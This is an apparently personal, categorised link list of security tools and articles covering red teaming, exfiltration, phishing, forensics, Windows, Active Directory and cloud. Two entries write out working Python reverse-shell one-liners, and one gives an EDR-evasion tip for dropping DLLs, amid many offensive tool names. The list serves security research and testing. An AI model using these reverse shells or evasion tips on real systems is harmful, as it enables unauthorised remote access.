RedGhost: Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace.
PowerSploit: is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
Z-Shave. Exploiting Z-Wave downgrade attacks
Totally Pwning the Tapplock Smart Lock - Andrew Tierney 13 Jun 2018
I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃: python -c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"

Red Team

Awesome Red Teaming
DumpsterFire: "Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
Machine Learning for Red Teams, Part 1
Flying under the radar: Hack into a „highly protected“ company without getting caught
demiguise: HTA encryption tool for RedTeams
Sn1per: Automated pentest framework for offensive security experts
jenkins-shell: Automating Jenkins Hacking using Shodan API
Cobalt Strike: is software for Adversary Simulations and Red Team Operations. 3.13 release notes
Red Team's SIEM: easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
The-Hacker-Playbook-3-Translation: 对 The Hacker Playbook 3 的翻译。
How Do I Prepare to Join a Red Team?
Red Team & Physical Entry Gear
Red Team Techniques: Gaining access on an external engagement through spear-phishing
Phantom Tap (PhanTap): an ‘invisible’ network tap aimed at red teams.
So You Want to Run a Red Team Operation: I built a red team for a Forbes 30 company, and now I am sharing some pointers to help you build one in your organization.
Alternative C2 for Red Teamers: Koadic Command & Control Framework. Koadic C3 COM Command & Control - JScript RAT
tunning tip: if you plan to drop a dll and load directly via macro from within office (winword or excel), use the following path %localappdata%\assembly\tmp<rand>\a.b.c.dll (it's a busy tmp folder and I doubt EDRs will notify on every file creation in that folder)

DNS

dnstwist
Plight At The End Of The Tunnel
dref: DNS Rebinding Exploitation Framework
dns-rebind-toolkit: A front-end JavaScript toolkit for creating DNS rebinding attacks.
Bypass firewalls by abusing DNS history: Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.
dnstwist: Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
Can I take over XYZ?: a list of services and how to claim (sub)domains with dangling DNS records.
SubR3con: is a script written in python. It uses Sublist3r to enumerate all subdomains of specific target and then it checks for stauts code for possible subdomain takeover vulnerability. This works great with Subover.go
TakeOver-v1: script extracts CNAME record of all subdomains at once. TakeOver saves researcher time and increase the chance of finding subdomain takeover vulnerability.
subzy: Subdomain takeover vulnerability checker.
Subdomain Takeover Scanner
subdomain-takeover: SubDomain TakeOver Scanner by 0x94.
DNSCrypt is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven’t been tampered with. dnscrypt-proxy 2, resolvers and docker image.

Exfiltration

Script for searching the extracted firmware file system for goodies!
DKMC - Dont kill my cat: Malicious payload evasion tool
Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
gitleaks: Searches full repo history for secrets and keys
Twitter Scraper
BloodHound: Six Degrees of Domain Admin, and a Python based ingestor for BloodHound
tinfoleak (github):The most complete open-source tool for Twitter intelligence analysis
Social IDs: Get user ids from social network handlers
SpookFlare: Meterpreter loader generator with multiple features for bypassing client-side and network-side countermeasures.
Photon: Incredibly fast crawler which extracts urls, emails, files, website accounts and much more.
Extracting data from an EMV (Chip-And-Pin) Card with NFC technology
BurpExtension-WhatsApp-Decryption-CheckPoint
Social Mapper - A Social Media Enumeration & Correlation Tool. github repo
accountanalysis: This tool enables you to evaluate Twitter accounts. For example how automated they are, how many Retweets they post, or which websites they link to most often.
How to get authentication key from SNMPv3 packets
AtomicTestsCommandLines.txt: Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
whois | GTFOBins: hangs waiting for the remote peer to close the socket. github
Browsers affected by the History API DoS
PacketWhisper: Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography
Using Google Analytics for data extraction
Exfiltrating credentials via PAM backdoors & DNS requests
Building simple DNS endpoints for exfiltration or C&C
CheckPlease: Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust.
okhttp-peer-certificate-extractor: This tool extracts peer certificates from given certificates.
DET: (extensible) Data Exfiltration Toolkit (DET)
awesome-python-login-model: login access for webscrapping.
Hamburglar: collect useful information from urls, directories, and files.
Giggity: grab hierarchical data about a github organization, user, or repo.
I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch): nc -lnvp 1234 / python3 -c "# 107, single statement, non-blocking import("subprocess").Popen("sh",0,None,*[ import("socket").create_connection(("127.0.0.1",1234))]3)" or "# 98, separators, blocking import subprocess as S,socket; S.run("sh",0,None,[ socket.create_connection(("127.0.0.1",1234))]*3)"
Living Off The Land Binaries and Scripts (and also Libraries) - github
Exfiltrate Like a Pro: Using DNS over HTTPS as a C2 Channel
Awesome Asset Discovery: List of Awesome Asset Discovery Resources

Phishing

Phishing on Twitter
evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
shellphish: Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest
pompa: Fully-featured spear-phishing toolkit - web front-end.
..Modlishka..: Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side).
Using phishing tools against the phishers — and uncovering a massive Binance phishing campaign.
Lure: User Recon Automation for GoPhish

Forensics

Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
O-Saft: OWASP SSL advanced forensic tool
PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics
The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
Invoke-LiveResponse
Linux Forensics
CDQR: The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
mac_apt: macOS Artifact Parsing Tool
MacForensics: Repository of scripts for processing various artifacts from macOS (formerly OSX).
imago-forensics: Imago is a python tool that extract digital evidences from images.
remedi-infrastructure: setup and deployment code for setting up a REMEDI machine translation cluster
Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
libelfmaster: Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
usbrip (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.

Blue Team

(pt-br)Analisando ameaças com Mitre ATT&CK Navigator
ATT&CK™ Navigator: Web app that provides basic navigation and annotation of ATT&CK matrices github.
Awesome Honeypots: A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects.
Blue Team Fundamentals.
Blue Team fundamentals Part Two: Windows Processes.

Threat Hunting

Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
Talos Blog || Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Adwind Dodges AV via DDE
strelka: Scanning files at scale with Python and ZeroMQ
Threat-Hunting: Personal compilation of APT malware from whitepaper releases, documents and own research
ThreatHunter-Playbook: A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.
HELK - The Hunting ELK: The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
mordor: Re-play Adversarial Techniques.
MISP (core software) - Open Source Threat Intelligence Platform (formely known as Malware Information Sharing Platform)
MISP galaxy: Clusters and elements to attach to MISP events or attributes (like threat actors)
ioc_writer: Provide a python library that allows for basic creation and editing of OpenIOC objects.

SIEM

Sigma: Generic Signature Format for SIEM Systems
Events Heatmap
RedELK: Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
plaso: Super timeline all the things.
Heatmaps Make Ops Better
graylog-guide-snort: How to send structured Snort IDS alert logs into Graylog
TALR: Threat Alert Logic Repository
Auditing Continuously vs. Monitoring Continuously
Logsspot: Logsspot is a project created to help cybersec folks understand what kind of information a security technology can present and how to use to improve detection and intelligence.
Corsair: Python wrapper for some NSOC tools. Corsair aims to implement RESTFul wrappers for different tools commonly used by Network and Security Operations Centers (NSOC).

Browsers

Bypassing Browser Security Warnings with Pseudo Password Fields
The 9 Lives of Bleichenbacher's CAT: New Cache ATtacks on TLS Implementations
How To Blow Your Online Cover With URL Previews
Nefarious LinkedIn: A look at how LinkedIn exfiltrates extension data from your browser.
Lightnion: A light version of Tor portable to the browser.
Puppeteer: Headless Chrome Node API. site
uBlock Origin: An efficient blocker for Chromium and Firefox. Fast and lean.

Operating Systems

Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
bochspwn-reloaded: A Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
drltrace: Drltrace is a library calls tracer for Windows and Linux applications.
shellz: is a small utility to track and control your ssh, telnet, web and custom shells.
CLIP OS: Open Source secured operating system by Agence nationale de la sécurité des systèmes d'information
How to Get Started With VMware vSphere Security « vMiss.net
routeros: RouterOS Bug Hunt Materials Presented at Derbycon 2018
Awesome-Study-Resources-for-Kernel-Hacking: Kernel Hacking study materials collection
Skadi: Collect, Process, and Hunt with host based data from MacOS, Windows, and Linux.

UEFI

uefi-jitfuck: A JIT compiler for Brainfuck running on x86_64 UEFI
Secure Boot in the Era of the T2: Continuing our series on Apple’s new T2 platform and examining the role it plays in Apple’s vision of Secure Boot.
PSPTool: Display, extract, and manipulate PSP firmware inside UEFI images
Project Mu: is a modular adaptation of TianoCore's edk2 tuned for building modern devices using a scalable, maintainable, and reusable pattern. github repo

Windows

Awesome Advanced Windows Exploitation References
windows kernel security development
A process scanner detecting and dumping hollowed PE modules.
dll_to_exe: Converts a DLL into EXE
pe-sieve: Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
A PowerShell utility to dynamically uncover a DCShadow attack
Security Research from the Microsoft Security Response Center (MSRC)
DCSYNCMonitor
Total Meltdown?
DetectionLab: Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. Post here
powerlessshell: Run PowerShell command without invoking powershell.exe.
internal-monologue: Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
Robber is open source tool for finding executables prone to DLL hijacking
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.
Remote-Desktop-Caching
LogRM: LogRM is a post exploitation powershell script which it uses windows event logs to gather information abou
InvisiblePersistence: Persisting in the Windows registry "invisibly"
Dynamic Tracing in Windows 10 19H1
Capturing NetNTLM Hashes with Office [DOT] XML Documents
LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
Passing-the-Hash to NTLM Authenticated Web Applications
Detours: Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form.
r0ak: r0ak ("roak") is the Ring 0 Army Knife -- A Command Line Utility To Read/Write/Execute Ring Zero on for Windows 10 Systems.
SpeculationControl: SpeculationControl is a PowerShell script that summarizes the state of configurable Windows mitigations for various speculative execution side channel vulnerabilities, such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown).
Reverse Engineering Windows Defender (by Alexei Bulazel): pdf and videos
- Ground Zero: Part 2-2 XOR encryption – Windows x64
- Ground Zero: Part 2-3 Building Cracked Binaries – Windows x64
EKFiddle: A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.
Windows Command-Line: Introducing the Windows Pseudo Console (ConPTY) – Windows Command Line Tools For Developers
MSconsole: Windows Console Tools
PowerShell Remoting by Stephanos Constantinou Blog
BloodHound Database Creator: This python script will generate a randomized data set for testing BloodHound features and analysis.
Windows Privilege Escalation (Unquoted Path Service)
DbgShell: A PowerShell front-end for the Windows debugger engine.
Windows Incident Response: Updates
pe_to_shellcode: Converts PE into a shellcode
Win 10 related research
- Event log 'Keywords' p1
- Windows 10 - Notifications
UAC bypass using CreateNewLink COM interface
Remote NTLM relaying through meterpreter on Windows port 445, DivertTCPconn: A TCP packet diverter for Windows platform.
Analyzing obfuscated powershell with shellcode, Empire is a PowerShell and Python post-exploitation agent.
Suspicious Use of Procdump: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.
relayer: SMB Relay Attack Script
Ps1jacker: Ps1jacker is a tool for generating COM Hijacking payload.
python-dotnet-binaryformat: Pure Python parser for data encoded by .NET's BinaryFormatter
WinPwnage: Elevate, UAC bypass, privilege escalation, dll hijack techniques
Invoke-PSImage: Embeds a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
Firework: Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process.
hUACME: Defeating Windows User Account Control
SysmonTools: Utilities for Sysmon
sysmon-config: Sysmon configuration file template with default high-quality event tracing.
Sysmon: how to set up, update and use?
Panache_Sysmon: Just another sysmon config
Hiding malware in Windows – The basics of code injection
Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. announcement
Bypassing AppLocker Custom Rules: 0x09AL Security blog
Detailed properties in the Office 365 audit log
SpecuCheck: SpecuCheck is a Windows utility for checking the state of the software mitigations against CVE-2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre)
stager.dll: Code from this article
RID-Hijacking: Windows RID Hijacking persistence technique
WSL Reloaded
Windows oneliners to download remote payload and execute arbitrary code
reflectivepotato: MSFRottenPotato built as a Reflective DLL. Work in progress.
randomrepo: Repo for random stuff
Microsoft Windows win32k.sys: Invalid Pointer Vulnerability (MSRC Case 48212) - Security Research
rdpy: Remote Desktop Protocol in Twisted Python
SharpWeb: NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge.
reconerator: C# Targeted Attack Reconnissance Tools
ManbagedInjection: A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge
InveighZero: C# LLMNR/NBNS spoofer
DanderSpritz Lab: A fully functional DanderSpritz lab in 2 commands.
Lateral movement using URL Protocol gist
HiddenPowerShell: This project was created to explore the various evasion techniques involving PowerShell: Amsi, ScriptBlockLogging, Constrained Language Mode and AppLocker.
One Windows Kernel.
The Dog Whisperer’s Handbook: This PDF is a collection of bits and pieces that were scattered across the web and that I collected in the last two years while writing the CypherDog PowerShell module.
Attack and Defend microsoft enhanced security administrative environment
raw-socket-snifferr: Packet capture on Windows without a kernel drive
DCOMrade: Powershell script for enumerating vulnerable DCOM Applications
shed: .NET runtime inspector
Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
How to steal NTLMv2 hashes using file download vulnerability in web application
Securing SCOM in a Privilege Tiered Access Model–Part 1
Simpleator: ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that lever
WinDbg-Samples: Sample extensions, scripts, and API uses for WinDbg.
Windows Privilege Escalation Guide: This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect.
OrgKit: Provision a brand-new company with proper defaults in Windows, Offic365, and Azure
Leveraging WSUS.
windowsblindread: A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
azucar: Security auditing tool for Azure environments
volatility-wnf: Browse and dump Windows Notification Facilities.
NetNTLMtoSilverTicket: SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket.
Domain Goodness – How I Learned to LOVE AD Explorer
Yet another sdclt UAC bypass: As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window.
awesome-windows-kernel-security-development: windows kernel security development.
An introduction to privileged file operation abuse on Windows: This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs.
Excel4-DCOM: PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe).
ALPC-BypassUAC: UAC Bypass with mmc via alpc.
ThreadBoat: Program uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
ManagedPasswordFilter: Windows Password Filter that uses managed code internally
DeviceGuardBypasses: A repository of some of my Windows 10 Device Guard Bypasses
rifiuti2: Windows Recycle Bin analyser
Control Flow Guard Teleportation: The idea that I tried in 2018 was to use Control Flow Guard (CFG) to regenerate my code in a special memory region. CFG is a security feature that aims to mitigate the redirection of the execution flow, for example, by checking if the target address for an indirect call is valid function. demo
Down the Rabbit-Hole...: It wouldn’t make sense if an unprivileged window could just send commands to a highly privileged window, and that’s what UIPI, User Interface Privilege Isolation, prevents. This isn’t a story about UIPI, but it is how it began. ctftool - Interactive CTF Exploration Tool
Reversing and Patching .NET Binaries with Embedded References
Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
Windows PowerShell Remoting: Host Based Investigation and Containment Techniques.
.NET Manifesto: win friends and influence the loader. malwariaLabs. slides from derbycon 2019
Bypassing Windows User Account Control
symboliclink-testing-tools: This is a small suite of tools to test various symbolic link types of Windows.
Run PowerShell without Powershell.exe — Best tools & techniques
Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor

Active Directory

Active Directory Control Paths
Gaining Domain Admin from Outside Active Directory, using Responder(LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay)
Invoke-ADLabDeployer: Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams.
PowerShellClassLab: This is a set of Azure Resource Manager Templates that generates an Active Directory lab consisting of a Domain Controller, two Windows servers and a Linux server.
ADImporter
Low Privilege Active Directory Enumeration from a non-Domain Joined Host
Active Directory as a C2
Escalating privileges with ACLs in Active Directory
Active Directory Kill Chain Attack & Defense: This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
#TR19 Active Directory Security Track
Penetration Testing Active Directory, Part I: I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’re ready for a pentest, which then leads me to getting domain administrator in fifteen minutes by just exploiting misconfigurations in AD.
Penetration Testing Active Directory, Part II: For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation.
Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory.
Exploiting PrivExchange: The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host.
Case Study: Password Analysis with BloodHound
Bypassing AD account lockout for a compromised account
Azure AD and ADFS best practices: Defending against password spray attacks
windapsearch: Python script to enumerate users, groups and computers from a Windows domain through LDAP queries
LDAP Ping and Determining Your Machine’s Site
Non-Admin NTLM Relaying & ETERNALBLUE Exploitation
Active Directory administrative tier model
Exchange-AD-Privesc: Exchange privilege escalations to Active Directory
Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege Escalation
Hunting for reconnaissance activities using LDAP search filters
Faking an AD account password change is possible , but detectable..

Mimikatz

Active Directory Kill Chain Attack & Defense: This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
A little tool to play with Windows security
Preventing Mimikatz Attacks – Blue Team – Medium
pypykatz: Mimikatz implementation in pure Python
Walk-through Mimikatz sekurlsa module

macOS/iOS

An iOS App In Assembly
Having fun with macOS 1days
x18-leak: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.
EmPyre: A post-exploitation OS X/Linux agent written in Python 2.7
SDQAnalyzer: a Saleae analyzer plugin for the SDQ (Apple Lightning, MagSafe, Battery) protocol.
Inside Code Signing
jelbrekTime: An developer jailbreak for Apple watch S3 watchOS 4.1
Disabling MacOS SIP via a VirtualBox kext Vulnerability
mOSL: Bash script to audit and fix macOS High Sierra (10.13.x) security settings
Objective-See:
- DoNotDisturb: Detect Evil Maid Attacks
- sniffMK: sniff mouse and keyboard events
- Remote Mac Exploitation Via Custom URL Schemes
- The Mac Malware of 2018
KisMac2: KisMAC is a free, open source wireless stumbling and security tool for Mac OS X.
osx-security-awesome: A collection of OSX and iOS security resources
threadexec: A library to execute code in the context of other processes on iOS 11.
Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage
iOS12 Kernelcache Laundering
kernelcache-laundering: load iOS12 kernelcaches and PAC code in IDA
Armor: is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Tool Designed To Create Encrypted macOS Payloads
inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
opendrop: An open Apple AirDrop implementation written in Python
A sample of the iOS malware- sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
ipwndfu: open-source jailbreaking tool for older iOS devices.

Android

tip toeing past android 7’s network security configuration
A Story About Three Bluetooth Vulnerabilities in Android
Creating an Android Open Source Research Device on Your PC
Droidefense: Advance Android Malware Analysis Framework
android-device-check: Check Android device security settings
Project Zero: OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB
I'm looking at a Huawei P20 from China, let see what can I found

Linux

BCC: Tools for BPF-based Linux IO analysis, networking, monitoring, and more
OpenSnitch is a GNU/Linux port of the Little Snitch application firewall
Security Onion:Linux distro for IDS, NSM, and Log Management
Linux Kernel Defence Map
wcc: The Witchcraft Compiler Collection
Linux x86 Reverse Shell Shellcode
Ground Zero: Reverse Engineering:
- Part 1-2: Password Protected Reverse Shells – Linux x64
- Active Directory Dojo:
Dmesg under the hood: Dmesg allows us to grasp what's going on under the hood when the kernel gets bad. Check out how dmesg is able to read kernel logs and show to the user.
Randomize your MAC address using NetworkManager
Shadow-Box: Lightweight and Practical Kernel Protector for x86 (Presented at BlackHat Asia 2017/2018, beVX 2018 and HITBSecConf 2017) - presentation and other papers
mem-loader.asm: Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by x-c3ll
Privilege Escalation: pentestbook
Project Zero: A cache invalidation bug in Linux memory management
Announcing flickerfree boot for Fedora 29
The Linux Backdoor Attempt of 2003
(PT-BR) Análise de binários em Linux
GMER: Rootkit Detector and Remover
suprotect: Changing memory protection in an arbitrary process
A look at home routers, and a surprising bug in Linux/MIPS
(pt-br) Hacking Tricks: Escalação de Privilégio em Linux com Capability
Basic Linux Privilege Escalation: It's just a basic & rough guide.
Linux process infection (part I):Among the different tasks that a Red Team should carry out, there is one that is remarkable by its intrinsic craftsmanship: putting an APT inside a computer system and ensuring its persistence.
tpotce: T-Pot Universal Installer and ISO Creator.
Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials: LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.
Linux Kernel exploitation Tutorial.
The 101 of ELF files on Linux: Understanding and Analysis - Linux Audit
ebpf_exporter: Prometheus exporter for custom eBPF metrics
Zydra: is a file password recovery tool and Linux shadow file cracker. It uses the dictionary search or Brute force method for cracking passwords.
A gentle introduction to Linux Kernel fuzzing - code
Teardown of a Failed Linux LTS Spectre Fix: Today's blog will serve as a deep dive into a recent Spectre fix, one of dozens being manually applied to the upstream Linux kernel. We'll cover the full path this fix took, from its warning-inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels.
Ropstar: Automatic exploit generation for simple linux pwn challenges.

Cloud

Scout Suite: Multi-Cloud Security Auditing Tool
Cloud Security Research: Cloud-related research releases from the Rhino Security Labs team.

AWS

git-secrets: Prevents you from committing secrets and credentials into git repositories.
CloudMapper: CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
Security Monkey: Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.
my-arsenal-of-aws-security-tools: List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
RKMS: RKMS is a highly available key management service, built on top of AWS's KMS.
FireProx: AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation.
AWS IAM privileges as found using the AWS Policy Generator described at

Risk Assessment

Radio

Qualcomm chain-of-trust
Presenting QCSuper: a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phones. github
Logitech keyboards and mice vulnerable to extensive cyber attacks

Satellite

How Do I Crack Satellite and Cable Pay TV? (33c3)
- Capture data from QPSK-demodulated OOB bitstream with Saleae logic analyzer and output byte stream.
- Process QPSK-demodulated data into transport stream (SCTE 55-1)

Tools

Network Security Monitoring on Raspberry Pi type devices
A secure, shared workspace for secrets
bettercap, the Swiss army knife for network attacks and monitoring.
Tool Analysis Result Sheet and guide, via Detecting Lateral Movement through Tracking Event Logs by jpcertcc
EKOLABS tools repo
Vapor PwnedPasswords Provider: Package for testing a password against Pwned Passwords V2 API in Vapor
Is my password pwned?, bash script
XPoCe - XPC Snooping utilties for MacOS and iOS (version 2.0)
CTFR does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs.
Enterprise Password Quality Checking using any hash data sources (HaveIBeenPwned lists, et al)
DockerAttack: Various Tools and Docker Images
PyREBox is a Python scriptable Reverse Engineering sandbox
find3: High-precision indoor positioning framework, version 3
structured-text-tools: A list of command line tools for manipulating structured text data
telnetlogger: Simulates enough of a Telnet connection in order to log failed login attempts.
vault: A tool for secrets management, encryption as a service, and privileged access management
WeakNet LINUX 8: This is an information-security themed distribution that has been in development since 2010.
HiTB: It was a part of HackTheBox platform.
arphid: DYI 125KHz RFID read/write/emulate guide
Pybelt: The hackers tool belt
mhax
U2F Support Firefox Extension
git-bug: Distributed bug tracker embedded in Git
mkcert: A simple zero-config tool to make locally trusted development certificates with any names you'd like
trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
Polymorph is a real-time network packet manipulation framework with support for almost all existing protocols
query_huawei_wifi_router: A CLI tool that queries a Huawei LTE WiFi router (MiFi) to get statistics such as signal strength, battery status, remaining data balance etc
kravatte: Implementation of Kravatte Encryption Suite
atomic-red-team: Small and highly portable detection tests based on MITRE's ATT&CK.
noisy: Simple random DNS, HTTP/S internet traffic noise generator
infernal-twin: wireless hacking - This is automated wireless hacking tool
Google Chromium, sans integration with Google
Gammux: A Gamma muxing tool. This tool merges two pictures together by splitting them into high and low brightness images.
PDF Tools
openvotenetwork: Implementation of anonymous Open Vote Network in go
put2win: Script to automatize shell upload by PUT HTTP method to get meterpreter
Tools by Morphus Labs
Stratosphere IPS
Convert nmap Scans into Beautiful HTML Pages
Shellab: Linux and Windows shellcode enrichment utility
GeoInt
Cartero: Social Engineering Framework
python-nubia: A command-line and interactive shell framework.
nipe: is a script to make Tor Network your default gateway.
fuxploider: File upload vulnerability scanner and exploitation tool.
solo: FIDO2 USB+NFC token optimized for security, extensibility, and style
Joint Report On Publicly Available Hacking Tools: by Canadian Centre for Cyber Security.
social_mapper: A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
TheHive: a Scalable, Open Source and Free Security Incident Response Platform
APTSimulator: A toolset to make a system look as if it was the victim of an APT attack
debugger-netwalker: NetWalker Debugger
USB armory: open source flash-drive-sized computer
batch_deobfuscator: Deobfuscate batch scripts obfuscated using string substitution and escape character techniques.
Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
Big List of Naughty Strings
Netflix Cloud Security SIRT releases Diffy: A Differencing Engine for Digital Forensics in the Cloud - diffy repo.
Command-Line Snippets: A place to share useful, one-line commands that make your life easier.
IP-to-ASN - Team Cymru
4nonimizer: A bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN).
free Entropy Service.
Correct Horse Battery Staple: Secure password generator to help keep you safer online. code
CorrectHorse: random secure password generator.
XKCD-password-generator: Generate secure multiword passwords/passphrases, inspired by XKCD
Using a Hardened Container Image for Secure Applications in the Cloud
freedomfighting: A collection of scripts which may come in handy during your freedom fighting activities.
Machine Learning and Security: Source code about machine learning and security.
octofairy: A machine learning based GitHub bot for Issues.
kbd-audio: Tools for capturing and analysing keyboard input paired with microphone capture
certstreamcatcher: This tool is based on regex with effective standards for detecting phishing sites in real time using certstream and can also detect punycode (IDNA) attacks.
Wifiphisher: is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing.
chezmoi: Manage your dotfiles securely across multiple machines.
hexyl: A command-line hex viewer.
Giggity: Wraps github api for openly available information about an organization, user, or repo.
howmanypeoplearearound: Count the number of people around you by monitoring wifi signals .
LASCAR: Ledger's Advanced Side-Channel Analysis Repository.
Hostintel: A Modular Python Application To Collect Intelligence For Malicious Hosts - github
DarkNet_ChineseTrading
mXtract: Memory Extractor & Analyzer.
commando-vm: a fully customized, Windows-based security distribution for penetration testing and red teaming.
DarkSearch: The 1st real Dark Web search engine (Darksearch vs Ahmia)
Request Tracker for Incident Response
Introducing Inkdrop 4
